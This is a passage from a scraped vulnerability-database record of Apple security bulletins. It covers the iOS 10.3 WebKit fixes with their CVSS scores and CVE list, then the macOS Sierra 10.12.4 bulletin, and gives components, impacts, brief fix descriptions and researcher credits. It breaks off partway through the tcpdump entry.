Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy\n\nDescription: An access issue existed in Content Security Policy. This issue was addressed through improved access restrictions.\n\nCVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An information disclosure issue existed in the processing of OpenGL shaders. This issue was addressed through improved memory management.\n\nCVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2433: Apple\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2364: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**WebKit JavaScript Bindings**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2442: lokihardt of Google Project Zero\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Closing a window while paused in the debugger may lead to unexpected application termination\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2377: Vicki Pfau\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2405: Apple\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.\n\n**Settings**\n\nWe would like to acknowledge Adi Sharabani and Yair Amit of Skycure for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of iOS 10.3", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2378", "CVE-2017-2379", "CVE-2017-2380", "CVE-2017-2384", "CVE-2017-2386", "CVE-2017-2389", "CVE-2017-2390", "CVE-2017-2393", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2397", "CVE-2017-2398", "CVE-2017-2399", "CVE-2017-2400", "CVE-2017-2401", "CVE-2017-2404", "CVE-2017-2405", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2412", "CVE-2017-2414", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2419", "CVE-2017-2423", "CVE-2017-2424", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2433", "CVE-2017-2434", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2442", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2452", "CVE-2017-2453", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2457", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2484", "CVE-2017-2485", "CVE-2017-2486", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-2493", "CVE-2017-5029", "CVE-2017-6976"], "modified": "2017-03-27T00:00:00", "id": "APPLE:218B65DBD8E421B171C5CC7639BE893D", "href": "https://support.apple.com/kb/HT207617", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:57", "description": "# About the security content of macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite\n\nThis document describes the security content of macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite\n\nReleased March 27, 2017\n\n**apache**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: Multiple issues existed in Apache before 2.4.25. These were addressed by updating Apache to version 2.4.25.\n\nCVE-2016-0736\n\nCVE-2016-2161\n\nCVE-2016-5387\n\nCVE-2016-8740\n\nCVE-2016-8743\n\nEntry updated March 28, 2017\n\n**apache_mod_php**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Multiple issues existed in PHP before 5.6.30\n\nDescription: Multiple issues existed in PHP before 5.6.30. These were addressed by updating PHP to version 5.6.30.\n\nCVE-2016-10158\n\nCVE-2016-10159\n\nCVE-2016-10160\n\nCVE-2016-10161\n\nCVE-2016-9935\n\n**AppleGraphicsPowerManagement**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2421: @cocoahuke\n\n**AppleRAID**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2438: sss and Axis of 360Nirvanteam\n\n**Audio**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2420: Pekka Oikarainen, Matias Karhumaa and Marko Laakso of Synopsys Software Integrity Group\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2427: Axis and sss of Qihoo 360 Nirvan Team\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2449: sss and Axis from 360NirvanTeam\n\n**Carbon**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department, John Villamil, Doyensec\n\n**CoreGraphics**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreMedia**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted .mov file may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the handling of .mov files. This issue was addressed through improved memory management.\n\nCVE-2017-2431: kimyok of Tencent Security Platform Department\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous researcher\n\n**curl**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Maliciously crafted user input to libcurl API may allow arbitrary code execution\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2016-9586: Daniel Stenberg of Mozilla\n\n**EFI**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious Thunderbolt adapter may be able to recover the FileVault 2 encryption password\n\nDescription: An issue existed in the handling of DMA. This issue was addressed by enabling VT-d in EFI.\n\nCVE-2016-7585: Ulf Frisk (@UlfFrisk)\n\n**FinderKit**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Permissions may unexpectedly reset when sending links\n\nDescription: A permission issue existed in the handling of the Send Link feature of iCloud Sharing. This issue was addressed through improved permission controls.\n\nCVE-2017-2429: Raymond Wong DO of Arnot Ogden Medical Center\n\nEntry updated August 23, 2017\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**FontParser**\n\nAvailable for: OS X El Capitan v10.11.6 and OS X Yosemite v10.10.5\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution \n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2016-4688: Simon Huang of Alipay company\n\nEntry added April 11, 2017\n\n**HTTPProtocol**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**Hypervisor**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Applications using the Hypervisor framework may unexpectedly leak the CR8 control register between guest and host\n\nDescription: An information leakage issue was addressed through improved state management.\n\nCVE-2017-2418: Alex Fishman and Izik Eidus of Veertu Inc.\n\n**iBooks**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Parsing a maliciously crafted iBooks file may lead to local file disclosure\n\nDescription: An information leak existed in the handling of file URLs. This issue was addressed through improved URL handling.\n\nCVE-2017-2426: Craig Arendt of Stratum Security, Jun Kokatsu (@shhnjk)\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3, OS X El Capitan v10.11.6, and OS X Yosemite v10.10.5\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges \n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2443: Ian Beer of Google Project Zero\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to disclose kernel memory\n\nDescription: A validation issue was addressed through improved input sanitization.\n\nCVE-2017-2489: Ian Beer of Google Project Zero\n\nEntry added March 31, 2017\n\n**IOATAFamily**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2408: Yangkang (@dnpushme) of Qihoo360 Qex Team\n\n**IOFireWireAVC**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2436: Orr A, IBM Security\n\n**IOFireWireAVC**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local attacker may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2437: Benjamin Gnahm (@mitp0sh) of Blue Frost Security\n\n**IOFireWireFamily**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to cause a denial of service\n\nDescription: A null pointer dereference was addressed through improved input validation.\n\nCVE-2017-2388: Brandon Azad, an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-2410: Apple\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: The screen may unexpectedly remain unlocked when the lid is closed\n\nDescription: An insufficient locking issue was addressed with improved state management.\n\nCVE-2017-7070: Ed McKenzie\n\nEntry added August 10, 2017\n\n**Keyboards**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**LibreSSL**\n\nAvailable for: macOS Sierra 10.12.3 and OS X El Capitan v10.11.6\n\nImpact: A local user may be able to leak sensitive user information\n\nDescription: A timing side channel allowed an attacker to recover keys. This issue was addressed by introducing constant time computation.\n\nCVE-2016-7056: Cesar Pereida Garc\u00eda and Billy Brumley (Tampere University of Technology)\n\n**libxslt**\n\nAvailable for: OS X El Capitan v10.11.6\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2477\n\nEntry added March 30, 2017\n\n**libxslt**\n\nAvailable for: macOS Sierra 10.12.3, OS X El Capitan v10.11.6, and Yosemite v10.10.5\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**MCX Client**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Removing a configuration profile with multiple payloads may not remove Active Directory certificate trust\n\nDescription: An issue existed in profile uninstallation. This issue was addressed through improved cleanup.\n\nCVE-2017-2402: an anonymous researcher\n\n**Menus**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to disclose process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2409: Sergey Bylokhov\n\n**Multi-Touch**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2422: @cocoahuke\n\n**OpenSSH**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Multiple issues in OpenSSH\n\nDescription: Multiple issues existed in OpenSSH before version 7.4. These were addressed by updating OpenSSH to version 7.4.\n\nCVE-2016-10009\n\nCVE-2016-10010\n\nCVE-2016-10011\n\nCVE-2016-10012\n\n**OpenSSL**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local user may be able to leak sensitive user information\n\nDescription: A timing side channel issue was addressed by using constant time computation.\n\nCVE-2016-7056: Cesar Pereida Garc\u00eda and Billy Brumley (Tampere University of Technology)\n\n**Printing**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Clicking a malicious IPP(S) link may lead to arbitrary code execution\n\nDescription: An uncontrolled format string issue was addressed through improved input validation.\n\nCVE-2017-2403: beist of GrayHash\n\n**python**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing maliciously crafted zip archives with Python may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the handling of zip archives. This issue was addressed through improved input validation.\n\nCVE-2016-5636\n\n**QuickTime**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Viewing a maliciously crafted media file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in QuickTime. This issue was addressed through improved memory handling.\n\nCVE-2017-2413: Simon Huang(@HuangShaomang) and pjf of IceSword Lab of Qihoo 360\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Validating empty signatures with SecKeyRawVerify() may unexpectedly succeed\n\nDescription: An validation issue existed with cryptographic API calls. This issue was addressed through improved parameter validation.\n\nCVE-2017-2423: an anonymous researcher\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**SecurityFoundation**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted certificate may lead to arbitrary code execution\n\nDescription: A double free issue was addressed through improved memory management.\n\nCVE-2017-2425: kimyok of Tencent Security Platform Department\n\n**sudo**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A user in an group named \"admin\" on a network directory server may be able to unexpectedly escalate privileges using sudo\n\nDescription: An access issue existed in sudo. This issue was addressed through improved permissions checking.\n\nCVE-2017-2381\n\n**System Integrity Protection**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to modify protected disk locations\n\nDescription: A validation issue existed in the handling of system installation. This issue was addressed through improved handling and validation during the installation process.\n\nCVE-2017-6974: Patrick Wardle of Synack\n\n**tcpdump**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An attacker in a privileged network position may be able to execute arbitrary code with user assistance\n\nDescription: Multiple issues existed in tcpdump before 4.9.0. These were addressed by updating tcpdump to version 